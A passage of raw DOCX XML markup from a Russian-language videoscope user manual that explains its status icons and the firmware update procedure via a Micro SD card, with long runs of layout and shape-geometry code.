        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251683328" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1371600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>155575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="257810" cy="106680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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810" cy="10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2F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Уровень заряда батареек </w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="002F75CB">
        <w:t>- показан значок полностью заряженных батареек.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1320"/>
          <w:tab w:val="left" w:pos="1321"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251684352" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1371600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-96520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="220980" cy="219710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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098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2F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Карта памяти Micro SD </w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="002F75CB">
        <w:t>- указывает на наличие карты памяти Micro SD в соответствующем разъеме</w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="002F75CB">
        <w:t>видеоскопа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C1237" w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:w w:val="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="251460" cy="182880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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460" cy="182880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:w w:val="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Фотокамера </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- указывает, что видеоскоп находится в режиме</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>фотосъемки.</w:t>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r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4)</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Видеокамера </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- указывает, что видеоскоп находится в режиме</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>видеосъемки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00136EFB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136EFB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обновление программного</w:t>
      </w:r>
      <w:r w:rsidRPr="00136EFB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00136EFB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПРИМЕЧАНИЕ. Программное обеспечение видеоскопа может обновляться. Файлы для обновления программного обеспечения видеоскопа предоставляются бесплатно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Отформатируйте карту памяти Micro SD с использованием файловой системы FAT. Форматирование карты памяти выполняется с помощью</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:lastRenderedPageBreak/>
        <w:t>компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">Посетите веб-сайт </w:t>
      </w:r>
      <w:hyperlink r:id="rId83">
        <w:r w:rsidRPr="002F75CB">
          <w:t>www.auteltech.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve"> и загрузите дистрибутив обновленного программного обеспечения на карту памяти Micro</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>SD.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">Вставьте карту памяти Micro SD в соответствующий разъем видеоскопа. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>электропитания</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">, чтобы включить видеоскоп, а затем нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>со стрелкой вверх</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">, после чего появится окно, содержащее запрос на подтверждение начала обновления. Выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Yes [Да]</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>, чтобы выполнить обновление программного обеспечения видеоскопа.</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85376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3052445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>125095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1452880" cy="1097280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="14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528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C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>После успешного обновления программного обеспечения перезагрузите видеоскоп еще раз, чтобы завершить</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>обновление.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C86290" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686400" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>917575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>998220</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5731510" cy="3973830"/>
                <wp:effectExtent l="3175" t="3810" r="0" b="3810"/>
                <wp:wrapNone/>
                <wp:docPr id="14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3973830"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 1445 1445"/>
                            <a:gd name="T1" fmla="*/ T0 w 9026"/>
                            <a:gd name="T2" fmla="+- 0 6617 1572"/>
                            <a:gd name="T3" fmla="*/ 6617 h 6258"/>
                            <a:gd name="T4" fmla="+- 0 1445 1445"/>
                            <a:gd name="T5" fmla="*/ T4 w 9026"/>
                            <a:gd name="T6" fmla="+- 0 7829 1572"/>
                            <a:gd name="T7" fmla="*/ 7829 h 6258"/>
                            <a:gd name="T8" fmla="+- 0 6035 1445"/>
                            <a:gd name="T9" fmla="*/ T8 w 9026"/>
                            <a:gd name="T10" fmla="+- 0 7277 1572"/>
                            <a:gd name="T11" fmla="*/ 7277 h 6258"/>
                            <a:gd name="T12" fmla="+- 0 6035 1445"/>
                            <a:gd name="T13" fmla="*/ T12 w 9026"/>
                            <a:gd name="T14" fmla="+- 0 4567 1572"/>
                            <a:gd name="T15" fmla="*/ 4567 h 6258"/>
                            <a:gd name="T16" fmla="+- 0 1445 1445"/>
                            <a:gd name="T17" fmla="*/ T16 w 9026"/>
                            <a:gd name="T18" fmla="+- 0 5035 1572"/>
                            <a:gd name="T19" fmla="*/ 5035 h 6258"/>
                            <a:gd name="T20" fmla="+- 0 1445 1445"/>
                            <a:gd name="T21" fmla="*/ T20 w 9026"/>
                            <a:gd name="T22" fmla="+- 0 5587 1572"/>
                            <a:gd name="T23" fmla="*/ 5587 h 6258"/>
                            <a:gd name="T24" fmla="+- 0 1445 1445"/>
                            <a:gd name="T25" fmla="*/ T24 w 9026"/>
                            <a:gd name="T26" fmla="+- 0 6139 1572"/>
                            <a:gd name="T27" fmla="*/ 6139 h 6258"/>
                            <a:gd name="T28" fmla="+- 0 6035 1445"/>
                            <a:gd name="T29" fmla="*/ T28 w 9026"/>
                            <a:gd name="T30" fmla="+- 0 6607 1572"/>
                            <a:gd name="T31" fmla="*/ 6607 h 6258"/>
                            <a:gd name="T32" fmla="+- 0 6035 1445"/>
                            <a:gd name="T33" fmla="*/ T32 w 9026"/>
                            <a:gd name="T34" fmla="+- 0 5863 1572"/>
                            <a:gd name="T35" fmla="*/ 5863 h 6258"/>
                            <a:gd name="T36" fmla="+- 0 6035 1445"/>
                            <a:gd name="T37" fmla="*/ T36 w 9026"/>
                            <a:gd name="T38" fmla="+- 0 5311 1572"/>
                            <a:gd name="T39" fmla="*/ 5311 h 6258"/>
                            <a:gd name="T40" fmla="+- 0 6035 1445"/>
                            <a:gd name="T41" fmla="*/ T40 w 9026"/>
                            <a:gd name="T42" fmla="+- 0 4567 1572"/>
                            <a:gd name="T43" fmla="*/ 4567 h 6258"/>
                            <a:gd name="T44" fmla="+- 0 1445 1445"/>
                            <a:gd name="T45" fmla="*/ T44 w 9026"/>
                            <a:gd name="T46" fmla="+- 0 1572 1572"/>
                            <a:gd name="T47" fmla="*/ 1572 h 6258"/>
                            <a:gd name="T48" fmla="+- 0 1445 1445"/>
                            <a:gd name="T49" fmla="*/ T48 w 9026"/>
                            <a:gd name="T50" fmla="+- 0 2508 1572"/>
                            <a:gd name="T51" fmla="*/ 2508 h 6258"/>
                            <a:gd name="T52" fmla="+- 0 6035 1445"/>
                            <a:gd name="T53" fmla="*/ T52 w 9026"/>
                            <a:gd name="T54" fmla="+- 0 4558 1572"/>
                            <a:gd name="T55" fmla="*/ 4558 h 6258"/>
                            <a:gd name="T56" fmla="+- 0 6035 1445"/>
                            <a:gd name="T57" fmla="*/ T56 w 9026"/>
                            <a:gd name="T58" fmla="+- 0 2040 1572"/>
                            <a:gd name="T59" fmla="*/ 2040 h 6258"/>
                            <a:gd name="T60" fmla="+- 0 7967 1445"/>
                            <a:gd name="T61" fmla="*/ T60 w 9026"/>
                            <a:gd name="T62" fmla="+- 0 7361 1572"/>
                            <a:gd name="T63" fmla="*/ 7361 h 6258"/>
                            <a:gd name="T64" fmla="+- 0 6045 1445"/>
                            <a:gd name="T65" fmla="*/ T64 w 9026"/>
                            <a:gd name="T66" fmla="+- 0 7829 1572"/>
                            <a:gd name="T67" fmla="*/ 7829 h 6258"/>
                            <a:gd name="T68" fmla="+- 0 7967 1445"/>
                            <a:gd name="T69" fmla="*/ T68 w 9026"/>
                            <a:gd name="T70" fmla="+- 0 7361 1572"/>
                            <a:gd name="T71" fmla="*/ 7361 h 6258"/>
                            <a:gd name="T72" fmla="+- 0 6045 1445"/>
                            <a:gd name="T73" fmla="*/ T72 w 9026"/>
                            <a:gd name="T74" fmla="+- 0 6617 1572"/>
                            <a:gd name="T75" fmla="*/ 6617 h 6258"/>
                            <a:gd name="T76" fmla="+- 0 6045 1445"/>
                            <a:gd name="T77" fmla="*/ T76 w 9026"/>
                            <a:gd name="T78" fmla="+- 0 7361 1572"/>
                            <a:gd name="T79" fmla="*/ 7361 h 6258"/>
                            <a:gd name="T80" fmla="+- 0 7967 1445"/>
                            <a:gd name="T81" fmla="*/ T80 w 9026"/>
                            <a:gd name="T82" fmla="+- 0 7085 1572"/>
                            <a:gd name="T83" fmla="*/ 7085 h 6258"/>
                            <a:gd name="T84" fmla="+- 0 7967 1445"/>
                            <a:gd name="T85" fmla="*/ T84 w 9026"/>
                            <a:gd name="T86" fmla="+- 0 4567 1572"/>
                            <a:gd name="T87" fmla="*/ 4567 h 6258"/>
                            <a:gd name="T88" fmla="+- 0 6045 1445"/>
                            <a:gd name="T89" fmla="*/ T88 w 9026"/>
                            <a:gd name="T90" fmla="+- 0 5035 1572"/>
                            <a:gd name="T91" fmla="*/ 5035 h 6258"/>
                            <a:gd name="T92" fmla="+- 0 6045 1445"/>
                            <a:gd name="T93" fmla="*/ T92 w 9026"/>
                            <a:gd name="T94" fmla="+- 0 6607 1572"/>
                            <a:gd name="T95" fmla="*/ 6607 h 6258"/>
                            <a:gd name="T96" fmla="+- 0 7967 1445"/>
                            <a:gd name="T97" fmla="*/ T96 w 9026"/>
                            <a:gd name="T98" fmla="+- 0 5503 1572"/>
                            <a:gd name="T99" fmla="*/ 5503 h 6258"/>
                            <a:gd name="T100" fmla="+- 0 7967 1445"/>
                            <a:gd name="T101" fmla="*/ T100 w 9026"/>
                            <a:gd name="T102" fmla="+- 0 4567 1572"/>
                            <a:gd name="T103" fmla="*/ 4567 h 6258"/>
                            <a:gd name="T104" fmla="+- 0 6045 1445"/>
                            <a:gd name="T105" fmla="*/ T104 w 9026"/>
                            <a:gd name="T106" fmla="+- 0 3345 1572"/>
                            <a:gd name="T107" fmla="*/ 3345 h 6258"/>
                            <a:gd name="T108" fmla="+- 0 6045 1445"/>
                            <a:gd name="T109" fmla="*/ T108 w 9026"/>
                            <a:gd name="T110" fmla="+- 0 4090 1572"/>
                            <a:gd name="T111" fmla="*/ 4090 h 6258"/>
                            <a:gd name="T112" fmla="+- 0 7967 1445"/>
                            <a:gd name="T113" fmla="*/ T112 w 9026"/>
                            <a:gd name="T114" fmla="+- 0 4558 1572"/>
                            <a:gd name="T115" fmla="*/ 4558 h 6258"/>
                            <a:gd name="T116" fmla="+- 0 7967 1445"/>
                            <a:gd name="T117" fmla="*/ T116 w 9026"/>
                            <a:gd name="T118" fmla="+- 0 3814 1572"/>
                            <a:gd name="T119" fmla="*/ 3814 h 6258"/>
                            <a:gd name="T120" fmla="+- 0 7967 1445"/>
                            <a:gd name="T121" fmla="*/ T120 w 9026"/>
                            <a:gd name="T122" fmla="+- 0 1572 1572"/>
                            <a:gd name="T123" fmla="*/ 1572 h 6258"/>
                            <a:gd name="T124" fmla="+- 0 6045 1445"/>
                            <a:gd name="T125" fmla="*/ T124 w 9026"/>
                            <a:gd name="T126" fmla="+- 0 2040 1572"/>
                            <a:gd name="T127" fmla="*/ 2040 h 6258"/>
                            <a:gd name="T128" fmla="+- 0 6045 1445"/>
                            <a:gd name="T129" fmla="*/ T128 w 9026"/>
                            <a:gd name="T130" fmla="+- 0 3336 1572"/>
                            <a:gd name="T131" fmla="*/ 3336 h 6258"/>
                            <a:gd name="T132" fmla="+- 0 7967 1445"/>
                            <a:gd name="T133" fmla="*/ T132 w 9026"/>
                            <a:gd name="T134" fmla="+- 0 2508 1572"/>
                            <a:gd name="T135" fmla="*/ 2508 h 6258"/>
                            <a:gd name="T136" fmla="+- 0 7967 1445"/>
                            <a:gd name="T137" fmla="*/ T136 w 9026"/>
                            <a:gd name="T138" fmla="+- 0 1572 1572"/>
                            <a:gd name="T139" fmla="*/ 1572 h 6258"/>
                            <a:gd name="T140" fmla="+- 0 7977 1445"/>
                            <a:gd name="T141" fmla="*/ T140 w 9026"/>
                            <a:gd name="T142" fmla="+- 0 6617 1572"/>
                            <a:gd name="T143" fmla="*/ 6617 h 6258"/>
                            <a:gd name="T144" fmla="+- 0 7977 1445"/>
                            <a:gd name="T145" fmla="*/ T144 w 9026"/>
                            <a:gd name="T146" fmla="+- 0 7829 1572"/>
                            <a:gd name="T147" fmla="*/ 7829 h 6258"/>
                            <a:gd name="T148" fmla="+- 0 10471 1445"/>
                            <a:gd name="T149" fmla="*/ T148 w 9026"/>
                            <a:gd name="T150" fmla="+- 0 7277 1572"/>
                            <a:gd name="T151" fmla="*/ 7277 h 6258"/>
                            <a:gd name="T152" fmla="+- 0 10471 1445"/>
                            <a:gd name="T153" fmla="*/ T152 w 9026"/>
                            <a:gd name="T154" fmla="+- 0 4567 1572"/>
                            <a:gd name="T155" fmla="*/ 4567 h 6258"/>
                            <a:gd name="T156" fmla="+- 0 7977 1445"/>
                            <a:gd name="T157" fmla="*/ T156 w 9026"/>
                            <a:gd name="T158" fmla="+- 0 5227 1572"/>
                            <a:gd name="T159" fmla="*/ 5227 h 6258"/>
                            <a:gd name="T160" fmla="+- 0 10471 1445"/>
                            <a:gd name="T161" fmla="*/ T160 w 9026"/>
                            <a:gd name="T162" fmla="+- 0 6607 1572"/>
                            <a:gd name="T163" fmla="*/ 6607 h 6258"/>
                            <a:gd name="T164" fmla="+- 0 10471 1445"/>
                            <a:gd name="T165" fmla="*/ T164 w 9026"/>
                            <a:gd name="T166" fmla="+- 0 4567 1572"/>
                            <a:gd name="T167" fmla="*/ 4567 h 6258"/>
                            <a:gd name="T168" fmla="+- 0 7977 1445"/>
                            <a:gd name="T169" fmla="*/ T168 w 9026"/>
                            <a:gd name="T170" fmla="+- 0 3345 1572"/>
                            <a:gd name="T171" fmla="*/ 3345 h 6258"/>
                            <a:gd name="T172" fmla="+- 0 7977 1445"/>
                            <a:gd name="T173" fmla="*/ T172 w 9026"/>
                            <a:gd name="T174" fmla="+- 0 4282 1572"/>
                            <a:gd name="T175" fmla="*/ 4282 h 6258"/>
                            <a:gd name="T176" fmla="+- 0 10471 1445"/>
                            <a:gd name="T177" fmla="*/ T176 w 9026"/>
                            <a:gd name="T178" fmla="+- 0 4558 1572"/>
                            <a:gd name="T179" fmla="*/ 4558 h 6258"/>
                            <a:gd name="T180" fmla="+- 0 10471 1445"/>
                            <a:gd name="T181" fmla="*/ T180 w 9026"/>
                            <a:gd name="T182" fmla="+- 0 3814 1572"/>
                            <a:gd name="T183" fmla="*/ 3814 h 6258"/>
                            <a:gd name="T184" fmla="+- 0 10471 1445"/>
                            <a:gd name="T185" fmla="*/ T184 w 9026"/>
                            <a:gd name="T186" fmla="+- 0 2316 1572"/>
                            <a:gd name="T187" fmla="*/ 2316 h 6258"/>
                            <a:gd name="T188" fmla="+- 0 7977 1445"/>
                            <a:gd name="T189" fmla="*/ T188 w 9026"/>
                            <a:gd name="T190" fmla="+- 0 2592 1572"/>
                            <a:gd name="T191" fmla="*/ 2592 h 6258"/>
                            <a:gd name="T192" fmla="+- 0 7977 1445"/>
                            <a:gd name="T193" fmla="*/ T192 w 9026"/>
                            <a:gd name="T194" fmla="+- 0 3336 1572"/>
